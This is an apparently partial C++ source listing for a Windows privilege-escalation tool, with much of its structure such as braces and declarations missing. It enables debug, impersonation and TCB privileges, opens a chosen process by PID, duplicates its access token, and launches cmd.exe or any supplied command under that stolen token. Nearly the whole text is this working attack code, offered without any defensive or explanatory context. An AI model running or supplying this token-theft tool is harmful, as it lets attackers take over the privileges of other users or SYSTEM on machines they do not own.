cout << "(-) Ex.: " << name << " <PID> :: for open cmd.exe with new privilages.\n";
cout << "(-) Ex.: " << name << " <PID> \"<command>\" :: for execute command by priveleges of requested PID.\n";
BOOL SetPrivilege(HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege )
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
printf("\t(-) LookupPrivilegeValue error: %u\n", GetLastError());
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL))
printf("\t(-) AdjustTokenPrivileges error: %u\n", GetLastError());
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
printf("\t(-) The token does not have the specified privilege. ");
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &fhToken);
wchar_t *cPrivs[] = { L"SeAssignPrimaryTokenPrivilege", L"SeTcbPrivilege" };
for (int i = 0; i < 2; i++)
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
(LPCTSTR)cPrivs[i], // privilege to lookup
&fLuid)) // receives LUID of privilege
printf("LookupPrivilegeValue error: %u\n", GetLastError());
privs.PrivilegeCount = 1;
privs.Control = PRIVILEGE_SET_ALL_NECESSARY;
privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED;
privs.Privilege[0].Luid = fLuid;
PrivilegeCheck(fhToken, &privs, &bResult);
wprintf(L"\t(-) The process dosn't have the %s\n\n", cPrivs[i]);
int main(int argc, char *argv[])
if (argc <= 1 || argc >= 4)
DWORD pid = atoi(argv[1]);
cout << "\n[***] Starting the migrate functionality, requested PID => " << pid << " [***]\n";
cout << "(!) Check if the process have an required permissions...\n";
cout << "(!) Trying to set the necessary privileges.\n";
HANDLE currentProcessToken;
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, ¤tProcessToken);
wchar_t *privs[9] = {L"SeAssignPrimaryTokenPrivilege", L"SeTcbPrivilege", L"SeCreateGlobalPrivilege", L"SeDebugPrivilege", L"SeImpersonatePrivilege", L"SeIncreaseQuotaPrivilege", L"SeProfileSingleProcessPrivilege", L"SeSecurityPrivilege", L"SeSystemEnvironmentPrivilege"};
for (int i = 0; i < 9; i++)
if (!SetPrivilege(currentProcessToken, privs[i], true))
wprintf(L"Access denied to set %s \n", privs[i]);
cout << "\t(-) You does not have the specified privilege. Migration aborted.\n";
cout << "\t(+) All required Permissions was successfull granted.\n\n";
cout << "(!) Trying to open Handel for requested PID.\n";
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
cout << "\t(-) Can not open handle for requested PID";
cout << "\t(+) The HANDLE was created success.\n\n";
cout << "(!) Try to Duplicte existen tokens of the requested PID " << pid << "\n";
if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &NewTokens))
cout << "\t(-) Denied to handle Process Tokens\n";
cout << "\t(+) Extracting tokens was successfull\n";
if (!DuplicateTokenEx(NewTokens, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hPrimaryToken))
cout << "\t(-) Denied to Duplicate process Tokens\n";
cout << "\t(+) Duplicate tokens was successfull\n\n";
cout << "(!) Try to execute new process with duplicated tokens.\n";
ZeroMemory(&si, sizeof(si));
si.lpDesktop = L"WinSta0\\Default"; //window station and desktop of interactive user
ZeroMemory(&pi, sizeof(pi));
swprintf_s(cmd, L"cmd.exe /c %hs", command);
if (!CreateProcessWithTokenW(hPrimaryToken, 0x00000001, NULL, (LPWSTR)cmd, flag, NULL, NULL, &si, &pi))
cout << "\t(-) Somthing went wrong!!! \n\t";
printf(" -Can't create new process with Extracted tokens, got error: %u\n", GetLastError());
cout << "[***] We successfuly Migrated to requested PID. [***]\n";
cout << "[***] The CMD console with new privilages was opened. [***]\n";
cout << "[***] Command was executed succesfully!!! [***]";